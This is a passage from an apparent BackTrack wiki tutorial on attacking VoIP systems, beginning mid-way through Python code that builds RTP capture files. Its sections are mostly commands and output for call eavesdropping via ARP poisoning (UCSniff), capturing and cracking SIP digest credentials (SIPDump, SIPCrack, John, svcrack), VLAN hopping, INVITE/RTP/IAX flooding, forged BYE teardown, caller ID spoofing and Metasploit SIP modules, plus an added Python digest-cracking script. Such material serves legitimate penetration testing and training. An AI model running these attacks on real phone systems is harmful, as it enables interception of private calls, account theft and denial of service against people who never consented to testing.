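    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + udp
    return bytes.fromhex("000c29000001") + bytes.fromhex("000c29000002") + b"\x08\x00" + ip


def build_pcap(frames):
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1296900000 + i, 0, len(f), len(f)) + f
    return out


SAMPLE_PCAP = build_pcap([
    build_rtp_frame("192.168.1.118", 6000, "192.168.1.104", 6002, 2, b"\xff\x00"),        # captured first
    build_rtp_frame("192.168.1.118", 6000, "192.168.1.104", 6002, 1, b"\x80\x7f"),        # but is seq 1
    build_rtp_frame("192.168.1.104", 6002, "192.168.1.118", 6000, 1, b"\xff\xff", pt=8),  # PCMA: skipped
])

if __name__ == "__main__":
    for key, samples in extract_pcmu_streams(SAMPLE_PCAP).items():
        name = "%s_%d-to-%s_%d.wav" % key[:4]
        write_wav(name, samples)
        print(name, len(samples), "samples")
```

On a real capture call extract_pcmu_streams(open("sip.pcap", "rb").read(), ports={6000}) with the ports taken from the m=audio lines of the SDP in the INVITE/200 OK; each direction of a call is a separate stream (its own SSRC) and ends up in its own WAV, which is why UCSniff's file names below say "both" when it mixes them.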

Vomit

Vomit converts a Cisco IP phone RTP conversation into a wave file that can be played with ordinary sound players. Vomit requires a tcpdump output file. To get vomit up and running we need to download and install waveplay. Get it here:

http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay-20010924.tar.gz.5731.html

root@bt:~# tar -xzvf waveplay-20010924.tar.gz
waveplay-20010924/
waveplay-20010924/Makefile
waveplay-20010924/waveplay.c
waveplay-20010924/waveplay.ja.1
waveplay-20010924/wavefmt.h
waveplay-20010924/README
waveplay-20010924/waveplay.1
waveplay-20010924/README.jp
root@bt:~# cd waveplay-20010924
root@bt:~/waveplay-20010924# make
cc -c -o waveplay.o waveplay.c
cc waveplay.o -o waveplay
root@bt:~/waveplay-20010924# cp waveplay /usr/bin/

root@bt:/pentest/voip/vomit# ./vomit -r sip.dump | waveplay -S8000 -B16 -C1

UCsniff

UCSniff is a VoIP and IP video security assessment tool that integrates existing open source software into several useful features, allowing VoIP and IP video owners and security professionals to rapidly test for the threat of unauthorized VoIP and video eavesdropping. UCSniff supports ARP poisoning, VLAN hopping, VLAN discovery via CDP, sniffing and more; I consider it an all-in-one eavesdropping tool. Let's take a look at some usage examples.

UCSniff can operate in two modes:

Monitor mode - to be used on shared media the IP phones are connected to, i.e. a hub or a wireless access point; it can also be used in a switched environment by setting up a SPAN session on a Cisco switch.

Man in the middle mode - this mode has two additional sub-modes:

Learning mode

Targeted mode

Preparing UCSniff so we can run it from any location in BackTrack:

root@bt:/tmp# cd /pentest/voip/ucsniff/
root@bt:/pentest/voip/ucsniff# ./configure
root@bt:/pentest/voip/ucsniff# make
root@bt:/pentest/voip/ucsniff# make install

Monitor Mode Usage

root@bt:/tmp/ucsniff# ucsniff -i eth0 -M
UCSniff 2.1 starting
Running in Monitor Mode
File directory-users.txt can't be opened for reading in working directory
File targets.txt can't be opened for reading in working directory
Listening on eth0... (Ethernet)
  eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0

Starting Unified sniffing...
Warning: Please ensure that you hit 'q' when you are finished with this program.
Warning: 'q' re-ARPs the victims. Failure to do so before program exit will result in a DoS.

SIP Call in progress. (extension 200, ip 192.168.1.104) calling (extension 201, ip 192.168.1.118)
SIP Call in progress. (extension 200, ip 192.168.1.105) calling (extension 201, ip 192.168.1.104)
SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:7-3-both.wav'
SIP Call ended. Conversation recorded in file '200-Calling-201-5:2:8-2-both.wav'
Closing text interface...

Unified sniffing was stopped.

We can stop the session by pressing the Q key (which, as the warning above says, also re-ARPs the victims). UCSniff created several files: log files containing detailed information about the SIP transactions, pcap capture files that can be viewed in Wireshark, and wav files holding the conversation audio.

root@bt:/tmp/ucsniff# ls -l
total 376
-rw-r--r-- 1 root root  40854 Feb 5 05:02 200-Calling-201-5:2:7-3-both.wav
-rw-r--r-- 1 root root 115818 Feb 5 05:02 200-Calling-201-5:2:7-3.pcap
-rw-r--r-- 1 root root  46294 Feb 5 05:02 200-Calling-201-5:2:8-2-both.wav
-rw-r--r-- 1 root root 103940 Feb 5 05:02 200-Calling-201-5:2:8-2.pcap
-rw-r--r-- 1 root root    278 Feb 5 05:02 call_detail_log
-rw-r--r-- 1 root root    317 Feb 5 05:02 call_log
-rw-r--r-- 1 root root  10063 Feb 5 05:02 sip.log
-rw-r--r-- 1 root root  39073 Feb 5 05:02 sipdump.pcap
-rw-r--r-- 1 root root      0 Feb 5 05:01 skinny_log

MITM Learning Mode Usage

This mode uses the signalling protocol (SIP, Skinny) to map extensions to IP addresses. You can customize the targets to intercept only specific IP addresses or networks. In the following example we assume we are already on the VoIP VLAN; with the // // target specification UCSniff will ARP poison all hosts on the subnet.

root@bt:/tmp/ucsniff# ucsniff -i eth0 // //
UCSniff 2.1 starting
Listening on eth0... (Ethernet)
  eth0 -> 00:0C:29:84:98:B2 192.168.1.105 255.255.255.0

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

ARP poisoning victims:
 GROUP 1 : ANY (all the hosts in the list)
 GROUP 2 : ANY (all the hosts in the list)
Mapped new target entry: (IP: 192.168.1.118) --> extension 201 and name:
Mapped new target entry: (IP: 192.168.1.104) --> extension 200 and name:
SIP Call in progress. (extension 201, ip 192.168.1.118) calling (extension 200, ip 192.168.1.104)
SIP Call ended. Conversation recorded in file '201-Calling-200-5:13:4-2-both.wav'
Closing text interface...
ARP poisoner deactivated.
RE-ARPing the victims...
Unified sniffing was stopped.

If we take a look at UCSniff's targets file we can see the targets discovered during the attack:

root@bt:/tmp/ucsniff# cat targets.txt
192.168.1.118,201,,sip
192.168.1.104,200,,sip

MITM Target Mode

Target mode enables eavesdropping at a layer higher than just random audio streams or the IP addresses of phones whose extension you don't know. This mode has two sub-modes: Targeted User and Targeted Conversation. We can add targets manually to the targets.txt file in the following format:

x.x.x.x,extension,,sip

for example:

192.168.1.118,201,,sip

or use learning mode to auto-discover hosts.

root@bt:/tmp/ucsniff# ucsniff -i eth0 -T
UCSniff 2.1 starting
File targets.txt can't be opened for reading in working directory
No targets have been previously discovered in Targets file, targets.txt
Please run UCSniff in learning mode, or manually edit targets.txt

Once a valid targets.txt file is found you will be asked to choose an eavesdropping mode: 

root@bt:/tmp/ucsniff# ucsniff -i eth0 -T
UCSniff 2.1 starting
Parsed 2 entries in Targets file, targets.txt
UCSniff running in target mode. Parsed 2 previously discovered targets
Please select a Targeted Eavesdropping Mode:
1. User
Description: Eavesdrop on all calls to or from a particular endpoint.
2. Conversation
Description: Eavesdrop on bi-directional conversation flows between two selected endpoints.
Please select option (1) or (2):

Selecting "User" tells the tool to intercept all traffic between the one Target, and the rest of the network. 

In "Conversation" mode, two endpoints are selected and the network is ARP poisoned to intercept only the traffic between those two users.

UCSniff includes more useful tools and attack modes, like VLAN hopping (using ACE), which will be discussed later.

Xplico

Although Xplico is not in the BackTrack VoIP tools directory, it is a very useful tool for capturing SIP and RTP traffic (among other protocols). Xplico can be found in the BackTrack -> Digital Forensics -> Forensic Analysis menu. In case it is not present on your BackTrack installation you can simply install it with:

root@bt:~# apt-get install xplico

Xplico can capture live traffic or import a Wireshark PCAP file. Either way Xplico decodes the captured packets and reassembles them into the appropriate format, in our case SIP and RTP. After starting Xplico you will be asked to log in; the default username and password are both xplico.

Once we have successfully logged in to Xplico we need to create a case. We will be asked to choose between a live capture and importing a PCAP file; in this example we use Xplico for a live capture (ARP poisoning our targets in the background with arpspoof). Next we select our case and create a new session.

Choosing the newly created session brings up the main statistics page, with the option to choose the network adapter and to start/stop the capture process.

Here is an example for captured SIP traffic: 

An example for RTP decoded traffic: 

Capturing SIP Authentication using SIPDump

SIPDump is part of the SIPCrack tool suite. It performs a live capture of SIP digest authentication responses, or dumps them from a previously captured PCAP file. SIPDump usage:

root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0
SIPdump 0.3 ( MaJoMu | www.codito.de )
---------------------------------------
Usage: sipdump [OPTIONS]
        = file where captured logins will be written to
Options:
 -i     = interface to listen on
 -p     = use pcap data file
 -m     = enter login data manually
 -f ""  = set libpcap filter
* You need to specify dump file

Live capture using SIPDump: 

root@bt:/pentest/voip/sipcrack# ./sipdump -i eth0 auth.txt
SIPdump 0.3 ( MaJoMu | www.codito.de )
---------------------------------------
* Using dev 'eth0' for sniffing
* Starting to sniff with packet filter 'tcp or udp or vlan'
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')
* Dumped login from 192.168.1.104 -> 192.168.1.111 (User: '200')

Dumping authentication data from a PCAP file 

root@bt:/pentest/voip/sipcrack# ./sipdump -p /root/registration.pcap auth.txt
SIPdump 0.3 ( MaJoMu | www.codito.de )
---------------------------------------
* Using pcap file '/root/registration.pcap' for sniffing
* Starting to sniff with packet filter 'tcp or udp or vlan'
* Dumped login from 192.168.1.104 -> 192.168.1.101 (User: '200')
* Exiting, sniffed 1 logins

SIPDump writes each captured challenge/response to the specified file, one login per line. The fields are separated by double quotes, in the order server, client, user, realm, method, URI, nonce, cnonce, nonce count, qop, algorithm and response hash; the three empty fields in these entries show that Asterisk's challenge did not use qop:

192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"44b80d16""""MD5"8edc2d549294f6535070439fb069c968
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"46cce857""""MD5"4dfc7515936a667565228dbaa0293dfc
192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"2252e8fe""""MD5"5b895c6ae07ed8391212119aab36f108

We will discuss cracking these challenges in the attacking authentication chapter.

Attacking Authentication

SIP is susceptible to two types of authentication attack: offline cracking of a captured digest response and online brute forcing of accounts against the server. Before we take a look at these attacks, let's understand how SIP registration and authentication take place. SIP uses digest authentication, the same mechanism the HTTP protocol uses (HTTP Digest, RFC 2617). Because SIP is an ASCII-based protocol, the credentials are hashed rather than transported in clear text. When a SIP client (user agent) wants to authenticate to a SIP server, the server generates and sends a digest challenge (a 401 Unauthorized or 407 Proxy Authentication Required response) containing the following parameters:

Realm - identifies the set of credentials the server expects; usually it is the SIP domain (asterisk in the captures above).

Nonce - a unique, server-generated string issued for each registration request. It is typically derived from a timestamp and a server secret so that it has a limited lifetime and cannot be reused.

Once the client receives the challenge and the user enters his credentials, the client combines username, realm, password, request method, request URI and nonce into an MD5 digest response and sends it back to the server in the Authorization header. Note that the only secret in this exchange is the password itself: everything else travels in clear text, so whoever captures one challenge/response pair can test candidate passwords offline at leisure, which is exactly what SIPCrack does.

With that said, let's try to crack the digest response in order to obtain a valid SIP account password.

Cracking SIP Digest response hashes

BackTrack provides a great tool called SIPCrack. We already discussed how to capture a valid SIP authentication digest response using SIPDump. SIPCrack can be found in:

root@bt:/pentest/voip/sipcrack#

SIPCrack Usage:

root@bt:/pentest/voip/sipcrack# ./sipcrack
SIPcrack 0.3 ( MaJoMu | www.codito.de )
----------------------------------------
Usage: sipcrack [OPTIONS] [ -s | -w ]
        = file containing logins sniffed by SIPdump
Options:
 -s           = use stdin for passwords
 -w wordlist  = file containing all passwords to try
 -p num       = print cracking process every n passwords (for -w)
                (ATTENTION: slows down heavily)
* Either -w or -s has to be given

SIPCrack can operate in two modes:

Dictionary attack

STDIN

Dictionary attack

Backtrack provides some basic dictionaries which are

located in: 

root@bt:/pentest/passwords/wordlists

But for the purpose of this article I will use another great tool in BackTrack called Crunch, which creates custom dictionaries. Let's use crunch to create a six-character numeric dictionary. Crunch is located in:

root@bt:/pentest/passwords/crunch#

Crunch Usage: 

usage: crunch [-f /path/to/charset.lst charset-name] [-o wordlist.txt] [-t [FIXED]@@@@] [-s startblock] [-c number]

For detailed crunch usage check its manual: 

root@bt:/pentest/passwords/crunch# man crunch

Creating a six chars numeric dictionary:

root@bt:/pentest/passwords/crunch# ./crunch 6 6 -f charset.lst numeric -o /pentest/voip/sipcrack/sipass.txt
Crunch will now generate 7000000 bytes of data
Crunch will now generate 6 MB of data
Crunch will now generate 0 GB of data
100%

We will use the SIP credentials previously captured by SIPDump into auth.txt, and sipass.txt (created with crunch) as the dictionary.

Cracking the Digest Response:

root@bt:/pentest/voip/sipcrack# ./sipcrack -w sipass.txt auth.txt
SIPcrack 0.3 ( MaJoMu | www.codito.de )
----------------------------------------
* Found Accounts:
Num  Server         Client         User  Hash|Password
1    192.168.1.101  192.168.1.104  200   3a33e768ed6f630347f4b511371926bd
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f
* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')
* Loaded wordlist: 'sipass.txt'
* Starting bruteforce against user '200' (MD5: '3a33e768ed6f630347f4b511371926bd')
* Tried 123457 passwords in 0 seconds
* Found password: '123456'
* Updating dump file 'auth.txt'... done
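To make the digest mechanism described in the attacking authentication introduction concrete, and to show what sipcrack does with each line of auth.txt, here is an added example, written for this page and not code from the wiki or from SIPcrack. It parses sipdump's line format (the field order is my reading of the auth.txt shown above), computes the RFC 2617 response the way SIP uses it, and runs an offline guess over any iterable of candidates, whether a wordlist like sipass.txt or a generator equivalent to crunch/john. SAMPLE_LINE is constructed with a password I chose; PAGE_LINE is the first auth.txt entry shown above. The "static MD5 hash" sipcrack prints is HA2, the half of the digest that does not depend on the password.

```python
"""SIP digest authentication: compute the response and crack a captured one.

Added example for this page; not code from the BackTrack wiki or SIPcrack.
"""
import hashlib
from itertools import product

# sipdump line layout (assumption based on the auth.txt shown above):
# server"client"user"realm"method"uri"nonce"cnonce"nc"qop"algorithm"response
FIELDS = ("server", "client", "user", "realm", "method", "uri",
          "nonce", "cnonce", "nc", "qop", "algorithm", "response")


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def parse_sipdump_line(line: str) -> dict:
    parts = line.rstrip("\n").split('"')
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return dict(zip(FIELDS, parts))


def digest_response(user, realm, password, method, uri, nonce, qop="", nc="", cnonce=""):
    """RFC 2617 digest as SIP (RFC 3261) uses it: MD5(HA1:nonce[:nc:cnonce:qop]:HA2)."""
    ha1 = md5_hex(f"{user}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")            # sipcrack's "static MD5 hash"
    if qop:
        return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def crack(entry: dict, candidates):
    """Offline guess: the password is the only unknown in the digest, so every
    candidate can be checked locally.  Returns the match or None."""
    target = entry["response"].lower()
    for password in candidates:
        guess = digest_response(entry["user"], entry["realm"], password, entry["method"],
                                entry["uri"], entry["nonce"], entry["qop"], entry["nc"],
                                entry["cnonce"])
        if guess == target:
            return password
    return None


def numeric_candidates(length: int):
    """Same keyspace as `crunch 6 6 -f charset.lst numeric` or `john --incremental=digits`."""
    for digits in product("0123456789", repeat=length):
        yield "".join(digits)


def make_sipdump_line(server, client, user, realm, method, uri, nonce, password) -> str:
    """Emit a sipdump-format line for a password we choose (used for the demo below)."""
    response = digest_response(user, realm, password, method, uri, nonce)
    return '"'.join((server, client, user, realm, method, uri, nonce, "", "", "", "MD5", response))


# Constructed entry: same endpoints, realm and nonce as the captures above, password chosen here.
SAMPLE_LINE = make_sipdump_line("192.168.1.111", "192.168.1.104", "200", "asterisk",
                                "REGISTER", "sip:192.168.1.104", "44b80d16", "123456")

# First entry of the auth.txt shown above; the page reports that sipcrack recovered '123456'.
PAGE_LINE = ('192.168.1.111"192.168.1.104"200"asterisk"REGISTER"sip:192.168.1.104"'
             '44b80d16""""MD5"8edc2d549294f6535070439fb069c968')

if __name__ == "__main__":
    for line in (SAMPLE_LINE, PAGE_LINE):
        entry = parse_sipdump_line(line)
        print(entry["user"], entry["nonce"], crack(entry, numeric_candidates(6)))
```

Because HA2 and the nonce are fixed for a given entry, each candidate costs two MD5 computations; a six-digit numeric keyspace is a million candidates and takes seconds, which is why numeric-only SIP secrets (the Asterisk default for many auto-provisioned phones) are not a defence once a single REGISTER has been captured.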

Brute Force attack using John The Ripper

For this attack mode we use John the Ripper as the password generator, redirecting its output into a FIFO which we feed to SIPCrack. Creating the FIFO:

root@bt:/tmp# mkfifo sipcrack

Generating passwords with john and redirecting the output to our FIFO; for this example we generate digit-only candidates of up to 6 characters. Writing to a FIFO blocks until sipcrack starts reading it, so run this in a separate terminal (or in the background) before the next step:

root@bt:~# john
[*] This script will take you to /pentest/passwords/jtr/
[*] From there, run ./john
root@bt:/pentest/passwords/jtr# ./john --incremental=digits --stdout=6 > /tmp/sipcrack

Using our FIFO file to crack the password: 

root@bt:/pentest/voip/sipcrack# ./sipcrack -w /tmp/sipcrack auth.txt
SIPcrack 0.3 ( MaJoMu | www.codito.de )
----------------------------------------
* Found Accounts:
Num  Server         Client         User  Hash|Password
1    192.168.1.111  192.168.1.104  200   8edc2d549294f6535070439fb069c968
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 0a84f78fde66bb15197eab961462dc2f
* Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968')
* Loaded wordlist: '/tmp/sipcrack'
* Starting bruteforce against user '200' (MD5: '8edc2d549294f6535070439fb069c968')
* Tried 3 passwords in 0 seconds
* Found password: '123456'
* Updating dump file 'auth.txt'... done

Brute forcing SIP Accounts

We can use svcrack, also part of the SIPVicious suite, to brute force SIP accounts online against the server. A single SIP account dictionary attack (you can add -v or -vv for verbosity):

root@bt:/pentest/voip/sipvicious# ./svcrack.py -u200 -d wordlist.txt 192.168.1.104
| Extension | Password |
------------------------
| 200       | 123456   |

A single SIP account brute force over a numeric range:

root@bt:/pentest/voip/sipvicious# ./svcrack.py -u200 -r100000-999999 192.168.1.104
| Extension | Password |
------------------------
| 200       | 123456   |

Use ./svcrack.py -h for all available arguments. Keep in mind that, unlike cracking a captured digest offline, every guess here is a REGISTER sent to the PBX, so the attempt shows up in its logs and may trip account lockouts or fail2ban-style blocking.

VLAN Hopping

Usually VoIP traffic is carried on a dedicated VLAN (Virtual LAN), as we saw in the topologies section. This means we cannot intercept the VoIP traffic from the data VLAN by sniffing and ARP poisoning: a VLAN is like a separate network, with its own broadcast domain and a different IP range than the data network. VLAN hopping is a way to "hop" into another VLAN, and luckily for us BackTrack includes the necessary tools to perform this attack. One common topology is where the IP phone has a built-in "internal switch": the PC is plugged into the phone's PC socket and the phone is connected from its LAN/SW socket to the network switch, as follows:

A typical CISCO switch port configuration for VoIP will look

something like: 

Switch# conf t
Enter configuration commands, one per line. End with CNTL/Z.
Switch(config)# interface fastEthernet 0/1
Switch(config-if)# switchport mode access
Switch(config-if)# switchport access vlan 10
Switch(config-if)# switchport voice vlan 20

The IP phone learns the voice VLAN ID (20) from the switch over CDP and tags its frames accordingly, while the PC's data traffic flows untagged on VLAN 10. Before we begin hopping around we have to enable support for the 802.1Q protocol in BackTrack by typing:

root@bt:~# modprobe 8021q

VoIP Hopper

VoIP Hopper hops into the voice VLAN by behaving like an IP phone; it supports specific switches and some IP phone models, currently from brands like Cisco, Avaya and Nortel. VoIP Hopper was designed to run under BackTrack Linux and currently has the following features: DHCP client, CDP generator, MAC address spoofing and VLAN hopping. Voiphopper usage:

root@bt:/pentest/voip/voiphopper# ./voiphopper
voiphopper -i <interface> -c {0|1|2} -a -n -v <VLANID>
Please specify 1 base option mode:
CDP Sniff Mode (-c 0)
  Example: voiphopper -i eth0 -c 0
CDP Spoof Mode with custom packet (-c 1):
  -D (Device ID)
  -P (Port ID)
  -C (Capabilities)
  -L (Platform)
  -S (Software)
  -U (Duplex)
  Example: voiphopper -i eth0 -c 1 -E 'SIP00070EEA5086' -P 'Port 1' -C Host -L 'Cisco IP Phone 7940' -S 'P003-08-8-00' -U 1
CDP Spoof Mode with pre-made packet (-c 2)
  Example: voiphopper -i eth0 -c 2
Avaya DHCP Option Mode (-a):
  Example: voiphopper -i eth0 -a
VLAN Hop Mode (-v VLAN ID):
  Example: voiphopper -i eth0 -v 200
Nortel DHCP Option Mode (-n):
  Example: voiphopper -i eth0 -n

VoIP Hopper provides many attack modes; use -h for detailed information. Let's take a look at an example of sniffing for CDP and hopping into the voice VLAN in a Cisco environment. Run VoIP Hopper on the Ethernet interface in the following way:

root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -c 0

VoIP Hopper also lets you hop to an arbitrary VLAN without sniffing for CDP. If you already know the voice VLAN ID, or would like to hop into another VLAN, just specify the VLAN ID:

root@bt:/pentest/voip/voiphopper# ./voiphopper -i eth0 -v 20
VoIP Hopper 1.00 Running in VLAN Hop mode ~ Trying to hop into VLAN 2
Added VLAN 20 to Interface eth0
Attempting dhcp request for new interface eth0.20

eth0.20   Link encap:Ethernet  HWaddr 00:0c:29:84:98:b2
          inet6 addr: fe80::20c:29ff:fe84:98b2/64 Scope:Link
          UP BROADCAST NOTRAILERS RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:2274 (2.2 KB)

Note that eth0.20 only has a link-local IPv6 address at this point: the DHCP request was still in progress when the interface was printed. If the voice VLAN has no DHCP server, assign an address from the voice range manually (ifconfig eth0.20 <address> netmask <mask>, both placeholders) before sniffing on it.

ACE

ACE is another VLAN hopping tool, very similar to VoIP Hopper in usage, and it also includes an option to discover TFTP servers (the phones' configuration servers). ACE usage:

root@bt:/pentest/voip/ace# ./ace
ACE v1.0: Automated Corporate (Data) Enumerator
Usage: ace [-i interface] [ -m mac address ] [ -t tftp server ip address | -c cdp mode | -v voice vlan id | -r vlan interface | -d verbose mode ]
-i <interface>       (Mandatory) Interface for sniffing/sending packets
-m <mac address>     (Mandatory) MAC address of the victim IP phone
-t <tftp server ip>  (Optional) tftp server ip address
-c <cdp mode 0|1 >   (Optional) 0 CDP sniff mode, 1 CDP spoof mode
-v <voice vlan id>   (Optional) Enter the voice vlan ID
-r <vlan interface>  (Optional) Removes the VLAN interface
-d                   (Optional) Verbose | debug mode

You can specify the VLAN to hop into manually or use its discovery feature.

Mode to specify the voice VLAN ID:

Example: ace -i eth0 -v 96 -m 00:1E:F7:28:9C:8E

Mode to auto-discover the voice VLAN ID by listening for CDP:

Example: ace -i eth0 -c 0 -m 00:1E:F7:28:9C:8E

Mode to auto-discover the voice VLAN ID by spoofing CDP:

Example: ace -i eth0 -c 1 -m 00:1E:F7:28:9C:8E

TIP: To view your MAC address in backtrack use: 

root@bt:~# macchanger -s eth0

It doesn't matter whether you used voiphopper or ace: you can now intercept VoIP traffic with tools like ucsniff by specifying your newly created interface. For example:

root@bt:/pentest/voip/ucsniff# ucsniff -i eth0.20 // //

Denial Of Service

A denial of service attack on VoIP services can render them useless by intentionally damaging the availability of the network and the VoIP systems. This attack can occur on two levels: standard network DoS attacks and VoIP-specific DoS attacks. Generally we send huge amounts of data, flooding the network to consume all of its resources, or target a specific protocol in order to overwhelm it with requests. Let's take a quick overview of the tools available in BackTrack.

Inviteflood

This tool can be used to flood a target with INVITE requests; it can be used to target SIP gateways/proxies and SIP phones.

root@bt:/pentest/voip/inviteflood# ./inviteflood
inviteflood - Version 2.0
June 09, 2006
Usage:
Mandatory -
        interface (e.g. eth0)
        target user (e.g. "" or john.doe or 5000 or "1+210-555-1212")
        target domain (e.g. enterprise.com or an IPv4 address)
        IPv4 addr of flood target (ddd.ddd.ddd.ddd)
        flood stage (i.e. number of packets)
Optional -
        -a flood tool "From:" alias (e.g. jane.doe)
        -i IPv4 source IP address [default is IP address of interface]
        -S srcPort (0 - 65535) [default is well-known discard port 9]
        -D destPort (0 - 65535) [default is well-known SIP port 5060]
        -l lineString line used by SNOM [default is blank]
        -s sleep time btwn INVITE msgs (usec)
        -h help - print this usage
        -v verbose output mode

A basic usage syntax looks like this:

./inviteflood eth0 target_extension target_domain target_ip number_of_packets

As long as the tool keeps flooding the SIP gateway it will prevent users from making phone calls. You can flood the SIP proxy with a nonexistent extension, making it generate 404 Not Found responses just to keep it busy.

Rtpflood

rtpflood is used to flood a target IP phone with UDP packets containing RTP data. In order to launch a successful attack using rtpflood you will need to know the RTP listening port on the remote device you want to attack; for example, the X-Lite softphone's default RTP port is 8000.

root@bt:/pentest/voip/rtpflood# ./rtpflood
usage: ./rtpflood sourcename destinationname srcport destport numpackets seqno timestamp SSID

Iaxflood

IAXFlood is a tool for flooding the IAX2 protocol, which is used by the Asterisk PBX.

root@bt:/pentest/voip/iaxflood# ./iaxflood
usage: ./iaxflood sourcename destinationname numpackets

Page 121: BackTrack Wiki

Teardown

Teardown is used to terminate a call by sending a BYE request:

./teardown eth0 extension sip_proxy 10.1.101.35 CallID FromTag ToTag

First you will need to capture a valid SIP 200 OK response and use its From and To tags and its Call-ID value.

SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.105;branch=z9hG4bKkfnyfaol;received=192.168.1.105;rport=5060
From: "200" ;tag=hcykd
To: "200" ;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 134 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Expires: 3600
Contact: ;expires=3600
Date: Tue, 01 Feb 2011 17:55:42 GMT
Content-Length: 0

If you specify the "-v" option you can see the payload:

SIP PAYLOAD for packet:
BYE sip:[email protected]:5060 SIP/2.0
Via: SIP/2.0/UDP 192.168.1.105:9;branch=91ca1ba5-98ee-44d5-9170-61c30981c565
From: <sip:192.168.1.104>;tag=hcykd
To: 200 <sip:[email protected]>;tag=as644fe807
Call-ID: jwtgckolqnoylqf@backtrack
CSeq: 2000000000 BYE
Max-Forwards: 16
User-Agent: Hacker
Content-Length: 0
Contact: <sip:192.168.1.105:9>

Spoofing Caller ID

There are several methods for spoofing Caller ID which we won't discuss here, because they require a different set of tools and equipment which are irrelevant to this article's purpose. Spoofing Caller ID in SIP is fairly easy: you just need to change the From header of the SIP INVITE request.

INVITE sip:@127.0.0.1 SIP/2.0
To: <sip:192.168.1.104>
Via: SIP/2.0/UDP 192.168.1.104
From: "Evil Hacker"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Forwards: 20
Contact: <sip:127.0.0.1>

We will take a look at a tool we have already discussed, Inviteflood, which can be used to send spoofed INVITE requests.

root@bt:/pentest/voip/inviteflood# ./inviteflood eth0 201 192.168.1.104 192.168.1.104 1 -a "Backtrack"

Attacking VoIP Using Metasploit

The Metasploit framework includes several auxiliary modules and exploits dedicated to VoIP. You can find them by using the search function with keywords such as "sip" or "voip". Let's launch "msfconsole" and perform a search for the available modules:

root@bt:~# msfconsole

msf > search sip

Metasploit VoIP Modules

Here's a complete list of the available modules for your reference:

Auxiliaries

scanner/sip/enumerator - SIP Username Enumerator (UDP)
scanner/sip/enumerator_tcp - SIP Username Enumerator (TCP)
scanner/sip/options - SIP Endpoint Scanner (UDP)
scanner/sip/options_tcp - SIP Endpoint Scanner (TCP)
voip/sip_invite_spoof - SIP Invite Spoof

Exploits

windows/sip/aim_triton_cseq - AIM Triton 1.0.4 CSeq Buffer Overflow
windows/sip/sipxezphone_cseq - SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
windows/sip/sipxphone_cseq - SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
unix/webapp/trixbox_langchoice - Trixbox langChoice PHP Local File Inclusion

Scanning SIP Enabled Devices

Metasploit provides a SIP scanner auxiliary module which comes in two flavors, TCP and UDP; we can use it to discover SIP-enabled devices using the OPTIONS method. Let's see an example of the UDP version, scanner/sip/options. Auxiliary options and usage:

msf > use auxiliary/scanner/sip/options
msf auxiliary(options) > show options

Module options (auxiliary/scanner/sip/options):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   CHOST                       no        The local client address
   CPORT      5060             no        The local client port
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   THREADS    1                yes       The number of concurrent threads
   TO         nobody           no        The destination username to probe at each host

msf auxiliary(options) > set RHOSTS 192.168.1.130/24
RHOSTS => 192.168.1.130/24
msf auxiliary(options) > run

[*] 192.168.1.20 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.21 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.22 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.92 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
[*] 192.168.1.140 200 agent='Grandstream HT-502 V1.2A 1.0.1.35' verbs='INVITE, ACK, OPTIONS, CANCEL, BYE, SUBSCRIBE, NOTIFY, INFO, REFER, UPDATE'
